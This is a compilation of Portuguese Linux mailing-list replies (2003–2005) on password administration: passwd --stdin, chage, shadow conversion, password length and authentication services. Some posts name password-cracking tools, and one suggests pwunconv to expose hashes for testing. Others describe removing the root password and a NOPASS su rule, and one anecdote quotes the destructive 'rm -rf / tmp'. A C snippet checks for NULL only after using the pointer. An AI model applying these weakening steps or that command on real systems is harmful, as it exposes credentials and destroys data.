apontar o apache.Utilizo o CL7. Grato Luis Gustavo *************************************************************** *************************************************************** De: Brunhara Para: crg3k@terra.com.br, Hadad Cc: linux-br@bazar.conectiva.com.br Assunto: Re: Re[2]: (linux-br) nao funciona = passwd --stdin Data: 02 Jan 2003 08:21:04 -0200 Ola Lista aqui tambem funcionou, como usuario root [root@ns1 aupg]# echo '1234' |passwd teste --stdin Changing password for user teste passwd: all authentication tokens updated successfully [root@ns1 aupg]# *************************************************************** De: Tiago F Bianchini Para: Adriano Palmieri Cc: Linux BR Conectiva Assunto: Re: (linux-br) descobrir senhas pelo arquivo /etc/passwd Data: 10 Feb 2003 11:02:45 -0200 Em Segunda 10 Fevereiro 2003 08:46, you wrote: > Existe alguma maneira de descobrir a senha dos usuarios do sistema pelo > arquivo /etc/passwd???? Ouvi falar de um software que faz isso... não. é um algoritmo irreversível (parece q se chama de uma mão, de um sentido, sei lá..) o q se pode é tentar quebrar a senha com dicionários de senhas comuns ou por força bruta. *************************************************************** De: Carlindo Marcelo Para: Adriano Palmieri Cc: Lista-BR Assunto: Re: (linux-br) descobrir senhas pelo arquivo /etc/passwd Data: 10 Feb 2003 11:10:00 -0200 Bom dia Adriano, Era possível descobrir senhas dos usuário quando as mesmas ficavam no /etc/passwd, hoje em dia, por motivos de segurança, as mesmas ficam armazenadas no /etc/shadow, sem direito de acesso por parte de um usuário comum. Esse programa que faz descoberta bruta de senhas no Linux, chamada-se John The Ripper... mas se usuário não tem direito de acessar o shadow, muito menos esse programa. Se quiser apenas testá-lo, utilize o comando pwconv para transferir as senhas do shadow para o passwd, ai sim poderá funcionar. Após os testes, utilize o comando pwunconv para voltar ao padrão de segurança ideal no seu sistema, ou seja, utilizar senhas shadow (/etc/shadow)... abraços. -- CARLINDO MARCELO MASSARI DA COSTA D e v i l t u x L i n u x S o l u t i o n s Administrador de Sistemas carlindo@myrealbox.com On 10 Feb 2003 10:46:39 +0000 Adriano Palmieri wrote: > Existe alguma maneira de descobrir a senha dos usuarios do sistema pelo > arquivo /etc/passwd???? Ouvi falar de um software que faz isso... *************************************************************** De: terceiraera Para: "André de Souza Araújo (GEINF)" Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) SOLUÇOES ALTERNATIVAS para autenticaçao e alteraçao de senhas dos USUÁRIOS da INTRANET Data: 14 Feb 2003 16:49:02 -0300 bom dia, nao sei se eh bem isto que voce quer, mas tem uma solucao bastante util: http://web.onda.com.br/orso/ trata-se de um script em cgi, muito simples de instalar e que permite que tesus usuarios troquem a senha a partir de uma pagina html. t+ Clovis. *************************************************************** De: Alipio Luiz Para: Edson Ahlert Cc: linux-br Assunto: Re: (linux-br) Tamanho das senhas Data: 26 Feb 2003 10:33:20 -0400 > > > Toda vez que alguém efetua a troca de senha, o sistema só aceita no > máximo 8 caracteres. > > > verifique no arquivo /etc/login.defs a seção PASS_MAX_LEN > Infelizmente não é neste arquivo, pois estou usando o NIS e é ele que > controla isso!!! voce esta habilitando senhas baseadas em MD5 ou somente shadows? habilite a opcao para utilizar senhas MD5... *************************************************************** De: Rodrigo Schmidt Nürmberg Para: lbr Cc: Antonio F. Zago Assunto: Re: (linux-br) Samba Data: 06 Mar 2003 06:48:13 -0300 Sim no /etc/shadow, porém funciona apenas para as contas no sistema, não para o samba. Não é necessário editar o arquivo, todos os linux que se utilizam desse sistema de senhas (criptografadas - /etc/passwd + /etc/shadow ) tem um aplicativo chamado "chage" Com ele você configura de quanto em quanto tempo é necessário mudar a senha, quando a conta fica inativada, expira. Dias antes de expirar a senha para ele avisar o usuário. Exemplo: chage -M 60 -W 3 -I 7 rodrigo segundo o exemplo assima a senha deve ser mudada de 60 em 60 dias ( -M 60 ), o usuário será avisado que ele precisa mudar a senha 3 dias antes dela expirar ( -W 3 ) e se ele não mudar a senha em 7 dias a conta é inativada ( -I 7 ). Para ativar a conta novamente é só usar o comando: chage -I 0 usuario. Já para o samba expirar as senhas eu precisarei além disso implementar o pam. Que eu já estou vendo como se faz. Mas mesmo assim obrigado ----- Original Message ----- From: "Antonio F. Zago" To: "Rodrigo Schmidt Nürmberg" Cc: "lbr" Sent: Wednesday, March 05, 2003 11:53 PM Subject: Re: (linux-br) Samba Em Qua, 2003-03-05 às 21:31, Rodrigo Schmidt Nürmberg escreveu: > Olá > > Como faço para programar as senhas do samba para expirar? Olá No arquivo de senhas tem um numero que controla isto, não sei se vale pro Samba. http://www.zago.eti.br/senhas.txt use CTRL+F para localizar expira http://www.zago.eti.br/menu.html Zago *************************************************************** De: Fabricio Gava Para: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) root sem senha Data: 12 Apr 2003 23:28:50 +0000 Pense bem antes de tirar a senha, prefira entrar como um usuario comum do que com o root, um erro você pode estragar tudo, ja comentaram dum cara que fez rm -rf / tmp, (tinha um espaço depois do barra) e apagou tudo! Pra tirar a senha: abre o /etc/shadow e na primeira linha vai ta mais ou menos assim: root:um_monte_de_caracteres:7::: tire esse monte de caracteres ficando assim root::7::: acho que deve resolver, se ele teimar, faça isso no /etc/passwd []'s Fabricio *************************************************************** De: Ataliba Teixeira Para: Selmo Menezes , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) root sem senha Data: 13 Apr 2003 09:49:01 -0300 On Sun, 13 Apr 2003 01:02:50 +0000 "Selmo Menezes" wrote: > > > Olá amantes do linux !! > > > Gostaria de saber como posso deixar o usuario root sem senha? > > > agradeco desde já !! > > > tem uma dica muito interessante sobre isto no site do Piter Punk, mas ele fala sobre a senha que a gente usa para entrar no root, via comando su. de uma olhada lah. pra exemplificar vou mostar abaixo. a maquina em exemplo, tem um usuario que tem o nome "usuario" : # # Arquivo /etc/suauth # # Permite ao usuario trocar para root com o proprio password # root:usuario:OWNPASS # caso voce queira que o usuario entre no root sem senha eh so usar a # linha abaixo root:usuario:NOPASS # Permite ao usuario trocar para qualquer usuario sem senha (exceto o root) # ALL EXCEPT root:usuario:NOPASS # Permite apenas aos usuarios do grupo wheel conectar como root # root:ALL EXCEPT GROUP wheel:DENY e por ai vai ... vale a pena dar uma olhada na dica do piter .... alias, vale a pena visitar o site do peter punk :-) abracao e espero ter ajudado -- *************************************************************** De: Paulino Kenji Sato Para: linux-br Assunto: Re: (linux-br) sudo [programa para gerenciamento de contas unix/samba] Data: 08 Apr 2003 14:18:25 -0300 On Mon, 7 Apr 2003, Pablo Roberto wrote: > Alguém poderia me dizer como faço para rodar um script php como root, > utilizando o sudo? > > Pablo Roberto Pra que quiser continuar a desenvolver ... http://enigma.nobel.com.br/gerusers-20011114.tar.gz Tem algums bugs. Não mexo nele a mais de um ano. Precisa melhorar o nivel de segurança entre o script php eo sudo bash script. Cria contas no passwd eo smbpasswd. Addon para on squirrell webmail. (acho que nao esta nesse tar.gz) Paulino *************************************************************** De: Thiago Macieira Para: rasga_dw9@hotmail.com Cc: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Senhas Iniciais Data: 12 May 2003 14:23:14 +0200 rasga_dw9@hotmail.com wrote: >Como eu faço para saber se meus usuarios udaram suas senhas iniciais??? ex >123mudar Utilize o comando chage para dizer que a senha expirou. O usuário será obrigado a modificar no próximo login. Ou use o próprio chage para verificar quando foi a última modificação. -- *************************************************************** De: Alvaro Figueiredo Para: Rafael lista , linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) trocar senha com uma linha de comando Data: 29 May 2003 23:08:05 -0300 Em Qua 28 Mai 2003 14:59, Rafael lista escreveu: > Tem como eu alterar a senha de um usuário com apenas uma linha > de comando ?????? > no caso, sem que ele me peça o password, já colocando o > password na linha onde eu escrevo o "passwd" e o nome do > usuário. Tente usar passwd --stdin username. Mas tem que rodar como root. Eu usei o sudo para isso. Testei no Conectiva e no Mandrake. -- *************************************************************** De: zgrp unknow Para: linux-br@bazar.conectiva.com.br Assunto: Re: (linux-br) Software para quebrar senhas que seja "clusterizável" Data: 22 May 2003 09:50:51 -0300 Olá Rafael, Utilize o DJohn (Distributed John The Ripper). :P http://ktulu.com.ar/djohn/index.html T+ *************************************************************** De: Felipe Kellermann Para: Wilson Bento Picaz Bom Cc: Linux-Br Assunto: Re: (linux-br) Script Data: 17 Jun 2003 13:55:52 -0300 On Tue, 17 Jun 2003 8:46am -0000, Wilson Bento Picaz Bom wrote: > Em um Script tenho uma variavel "senha". Gostaria que quando fosse > solicitada a gigitacao ficasse mascarada: "******". > > Tem como fazer isto ? $ cat senha.sh #!/bin/sh echo -n "senha: " while read -s -n1 a && [ "${a/[[:ctrl:]]/}" ] do echo -n \* && b="$b$a"; done; echo -e "\nsenha='$b'"; $ $_ senha: ********** senha='aquiasenha' $ -- *************************************************************** De:  Ricardo Para:  ¥ MASTER ¥ Cc:  linux-br@bazar.conectiva.com.br Assunto:  Re: (linux-br)Senha com o comando adduser Data:  Thu, 31 Jul 2003 15:06:56 -0300 (BRT) Já experimentou usar o autopasswd ? $ adduser -d dir_home username ; autopasswd username password ------------------------------- Ricardo      .-.      /v\     // \\    > L I N U X <    /(   )\     ^^-^^ ------------------------------- On Wed, 30 Jul 2003, ¥ MASTER ¥ wrote: > estou tentando adicionar um usuario pelo comando > "adduser", utilizando as opcoes que eles me fornece > > uma das opcoes me possibilita a inclusao do usuario > com uma senha, opcao "-p", sendo usado da seguinte > foram: > > adduser   -d dir_home  -p senha   username *************************************************************** De:  Adriano Frare Responder-a:  alfrare@terra.com.br Para:  linux-br@bazar2.conectiva.com.br Assunto:  (linux-br) Solução - MKPASSWD - CL9 Data:  Thu, 24 Jul 2003 08:05:57 -0300 Caros Colegas. O comando MKPASSWD gera automaticamente senhas randomicas, no CL9 o programa instalado no diretorio /usr/sbin/mkpasswd não é a correta. A correção para este problema e' fazer a instalação do pacote EXPECT, que após conclusão, vc encontrará a correta versão do MKPASSWD no seguinte caminho /usr/bin/mkpasswd Espero ter ajudado. Adriano Frare *************************************************************** De:  Ricardo Juiz Para:  Linux BR Assunto:  Re: (linux-br)Asterisco Data:  Sat, 06 Sep 2003 14:20:25 -0300 Esse asterisco no arquivo /etc/passwd indica que a senha está criptografada no arquivo /etc/shadow Falou JUIZ Andre Luiz da Silva wrote: Alguém pode me dizer o que eh um asteristo no campo senha do arquivo /etc/passwd? > *************************************************************** De:  rogerio araujo Para:  Edu Cc:  linux-br Assunto:  Re: (linux-br)Usuarios Data:  Mon, 08 Sep 2003 14:43:39 -0400 o comando passwd -l usuario faz isso. Em Seg, 2003-09-08 às 13:35, Edu escreveu: > Pessoal , alguem sabe me explicar como eu posso criar um usuario > que consiga apenas acessar o ftp, deixando bloqueado o login, ssh etc.. > Sistema: Conectiva linux 8.0 > Rogério Rodrigues de Araújo Analista de Sistemas / Técnico em Informática *************************************************************** De:  Tiago Cruz Para:  Marcelo Marra Assis Cc:  linux-br@bazar.conectiva.com.br Assunto:  Re: (linux-br) Criar usuário pela linha de Comando com senha Data:  Thu, 23 Oct 2003 08:40:51 -0200 On Wed, 22 Oct 2003 16:04:46 -0200 "Marcelo Marra Assis" wrote: >     Estou querendo criar um usuário pela linha de comando, onde em >     um único comando gostaria de já criar o usuário e já informar >     uma senha para ele. Simples # useradd tiago -c "Tiago Cruz" -g diretoria; echo "senhalinux" |  passwd tiago --stdin Necessita do pacote libgii Abraços, Tiago Cruz Org. King de Contab. S/C Ltda. Linux User # 282636 http://www.linuxrapido.linuxdicas.com.br Mandrake Linux i18n Team *************************************************************** De:  Marcus Vinicius S. Masson Para:  nod3vic3 Cc:  linux-br@bazar.conectiva.com.br Assunto:  Re: (linux-br) Função em C para verificar senha no linux Data:  Thu, 08 Jan 2004 14:48:17 -0800 Este programa verifica a senha do usuário em sistemas com shadow password:     #include     #include     #include     #include     #include     int login( char *user, char *passwd )     {         struct spwd *s_pwd;         struct passwd *n_pwd;         n_pwd = getpwnam ((const char *)user);         s_pwd = getspnam ( n_pwd->pw_name );         if( (n_pwd == NULL) || (s_pwd == NULL) )             return 0;         if (strcmp( s_pwd->sp_pwdp, (char *) crypt(passwd, s_pwd->sp_pwdp)) )             return 0;         return 1;     }     int main( int argc, char *argv[] )     {         if ( login( argv[1], argv[2] ) )         {             printf( "%s\n", "+OK" );         }         else         {             printf( "%s\n", "-ERR" );         }     } Espero que ajude Marcus. *************************************************************** De:  Andreas Para:  Salatiel-Robson Oliveira Cc:  seguranca@distro2.conectiva.com.br Assunto:  Re: [seguranca] Tamanho mínimo de senha Data:  Thu, 25 Sep 2003 09:52:02 -0300 On Wed, Sep 24, 2003 at 06:57:27PM -0300, Salatiel-Robson Oliveira wrote: > Como faço para configurar o tamanho minimo de senha de usuário? > > Alterei o parâmentro PASS_MIN_LEN no arquivo /etc/login.defs mas não > funcionou? Veja documentação sobre o módulo pam_cracklib do pacote pam. Lá tem parâmetros para ajustar a "qualidade" da senha, e tamanho mínimo é um deles. /usr/share/doc/pam-/ ou /usr/share/doc/pam-doc-/ deve ter essa documentação e exemplos. *************************************************************** De:  Anderson Lizardo Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)converter passwd p shadow Data:  Thu, 19 Feb 2004 13:32:01 -0400 On Qua, 18 Fev 2004 11:12:51 +0000, Wasley Almeida wrote: > Oi Pessoal > > Como faço para converter os usuários do passwd para shadow. pwconv Para mais informações: man pwconv Não se esqueça de executar "pwck -r" antes de efetuar a conversão para verificar possíveis erros de sintaxe no /etc/passwd. -- Anderson Lizardo lizardo@linuxfromscratch.org http://www.linuxfromscratch.org/ *************************************************************** De: Rodrigo Schmidt Nürmberg Para: lbr Cc: Antonio F. Zago Assunto: Re: (linux-br) Samba Data: 06 Mar 2003 06:48:13 -0300 Sim no /etc/shadow, porém funciona apenas para as contas no sistema, não para o samba. Não é necessário editar o arquivo, todos os linux que se utilizam desse sistema de senhas (criptografadas - /etc/passwd + /etc/shadow ) tem um aplicativo chamado "chage" Com ele você configura de quanto em quanto tempo é necessário mudar a senha, quando a conta fica inativada, expira. Dias antes de expirar a senha para ele avisar o usuário. Exemplo: chage -M 60 -W 3 -I 7 rodrigo segundo o exemplo assima a senha deve ser mudada de 60 em 60 dias ( -M 60 ), o usuário será avisado que ele precisa mudar a senha 3 dias antes dela expirar ( -W 3 ) e se ele não mudar a senha em 7 dias a conta é inativada ( -I 7 ). Para ativar a conta novamente é só usar o comando: chage -I 0 usuario. Já para o samba expirar as senhas eu precisarei além disso implementar o pam. Que eu já estou vendo como se faz. Mas mesmo assim obrigado ----- Original Message ----- From: "Antonio F. Zago" To: "Rodrigo Schmidt Nürmberg" Cc: "lbr" Sent: Wednesday, March 05, 2003 11:53 PM Subject: Re: (linux-br) Samba Em Qua, 2003-03-05 às 21:31, Rodrigo Schmidt Nürmberg escreveu: > Olá > > Como faço para programar as senhas do samba para expirar? Olá No arquivo de senhas tem um numero que controla isto, não sei se vale pro Samba. http://www.zago.eti.br/senhas.txt use CTRL+F para localizar expira http://www.zago.eti.br/menu.html Zago *************************************************************** De:  Manoel Pinho Para:  Luciano França Rocha Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Pesquisa de opnião... Data:  Wed, 31 Mar 2004 16:53:51 -0300 Luciano França Rocha escreveu: Eu queria saber a opnião de vocês sobre algumas soluções simples de uma rede. > > O que voces usam para: > > Autenticação? NIS, NIS+, LDAP, LDAP + Kerberos, samba ou outra coisa? > Eu uso NIS, nao é o melhor mais é o mais facil de se implementar em todas as > distros, vejo como o default do linux mesmo sendo muito inseguro e etc... >   > LDAP é mais interessante para redes heterogêneas. Se os Windows da sua rede forem XP/200/2003 vc pode usar o pGina: http://pgina.xpasystems.com/ para autenticar em um servidor openldap no linux, SEM precisar do samba. Compartilhamento de arquivos? NFS, CODA, Inermezzo, AFS ou SAMBA? > Eu uso o NFS pelo mesmo motivo acima. > >   > O NFS não é ruim e Samba só tem sentido em redes que tenham windows. O Coda, Intermezzo e AFS eu nunca usei e não conheço ninguém que use aqui no Brasil mas pelo menos o Coda deve ser bem estável e pode ser usado no Windows também. *************************************************************** De:  Frederico Recsky Para:  Thiago Caminha da Silva Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: Re: (linux-br)Pesquisa de opnião... Data:  Wed, 31 Mar 2004 15:31:57 -0300 (BRT) On Wed, 31 Mar 2004, Thiago Caminha da Silva wrote: > >Eu queria saber a opnião de vocês sobre algumas soluções simples de uma > rede. > > > >O que voces usam para: > > > >Autenticação? NIS, NIS+, LDAP, LDAP + Kerberos, samba ou outra coisa? > >Compartilhamento de arquivos? NFS, CODA, Inermezzo, AFS ou SAMBA? > >Eu uso o NFS pelo mesmo motivo acima. eu sou a favor do LDAP, ele combina com tudo , e tem um excelente how to no guia do servidor da conectiva (disponivel no proprio site deles) : ) _________________________________________         Frederico Fernandes Recsky  Daruma Orga Card Systems - Taubaté - SP         telefone (12)281-1900 r 131 _________________________________________ *************************************************************** De:  Jorge Godoy Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Pesquisa de opnião... Data:  Wed, 31 Mar 2004 12:46:52 -0300 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wednesday 31 March 2004 08:46, Luciano França Rocha wrote: > Autenticação? NIS, NIS+, LDAP, LDAP + Kerberos, samba ou outra coisa? > Eu uso NIS, nao é o melhor mais é o mais facil de se implementar em todas > as distros, vejo como o default do linux mesmo sendo muito inseguro e > etc... Se você sabe que é inseguro e problemático, não deveria usar. Configurar as estações para usar LDAP é simplérrimo em muitas delas, basta rodar o comando 'authconfig' e preencher os dados dos servidores, como você deve ter preenchido ali ou em outro lugar para o NIS. Configurar o servidor é algo que você faz apenas uma vez... > Compartilhamento de arquivos? NFS, CODA, Inermezzo, AFS ou SAMBA? > Eu uso o NFS pelo mesmo motivo acima. NFS é seguro desde que bem configurado e com um ponto central de autenticação. É inseguro para qualquer ambiente onde ele não esteja bem configurado ou onde o usuário possa forjar sua identidade. > Acho que é so, esses sao os serviços mais criticos e os que dao mais > problemas em uma rede linux na minha opniao, gostaria de saber o que as > pessoas tem usado. Não tenho muitos problemas com eles... Os maiores problemas são com as estações e aplicações, geralmente. Principalmente a parte de comunicação via voz (H.323), ouvir rádio na Internet, etc. - -- Godoy.     -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) *************************************************************** De:  Thiago Caminha da Silva Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Pesquisa de opnião... Data:  Wed, 31 Mar 2004 13:24:05 -0300 >Eu queria saber a opnião de vocês sobre algumas soluções simples de uma rede. > >O que voces usam para: > >Autenticação? NIS, NIS+, LDAP, LDAP + Kerberos, samba ou outra coisa? >Compartilhamento de arquivos? NFS, CODA, Inermezzo, AFS ou SAMBA? >Eu uso o NFS pelo mesmo motivo acima. Como eu uso uma rede hibrida, utilizando o linux como um PDC para estações windows uso o SAMBA, agora acredito que se você for usar uma rede full Linux, acredito que essa solução que você usa é a mais fácil de configurar mesmo, agora com relação a segurança, acho que eu utilizaria kerberos e e NFS. *************************************************************** De:  Adriano Frare Responder-a:  alfrare@terra.com.br Para:  'Klemen Berti' , linux-br@bazar2.conectiva.com.br Assunto:  RES: (linux-br) Autenticação sendmail+samba+squid Data:  Tue, 8 Jun 2004 08:23:00 -0300 Caro Colega, Segue abaixo alguns links interessantes sobre este assunto. http://www.falkotimme.com/howtos/sendmail_smtp_auth_tls/index.php http://www.linuxit.com.br/modules.php?name=Sections&op=printpage&artid=514 Abraços. Adriano Frare *************************************************************** De:  Thiago Macieira Para:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)Tamanho do login e password Data:  Wed, 29 Sep 2004 18:43:11 -0300 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 eduardo wrote: >Estou utiliznado CL10 e gostaria de descobrir qual o tamanho máximo do > login e da senha ? [corta] >CL10 não está utilizando MD5, está ? Está. Portanto a senha pode ter até 128 caracteres, eu acredito. - --   Thiago Macieira  -  Registered Linux user #65028    thiago (AT) macieira (DOT) info     ICQ UIN: 1967141   PGP/GPG: 0x6EF45358; fingerprint:     E067 918B B660 DBD1 105C  966C 33F5 F005 6EF4 5358 *************************************************************** De:  Bruno Para:  Alexandre Fonseca Cc:  linux-br@bazar2.conectiva.com.br Assunto:  Re: (linux-br)changepassword Data:  Sat, 29 Jan 2005 14:01:15 -0300 Oi Alexandre, dá uma olhada na documentação: http://changepassword.sourceforge.net/README.txt Este problema ocorre quando você utiliza um diretório temporário em uma partição que não seja a raiz. Se não me engano  isso pode ser configurado no arquivo conf.h Bo a sorte, Bruno > Estou usando changepassword-0.8 para mudar senha dos usuários do meu > servidor de email,porem quando tento mudar a senha de qualquer usuário o > sistema retorna a mensagem " impossível renomear o arquivo temporário " > *************************************************************** ***************************************************************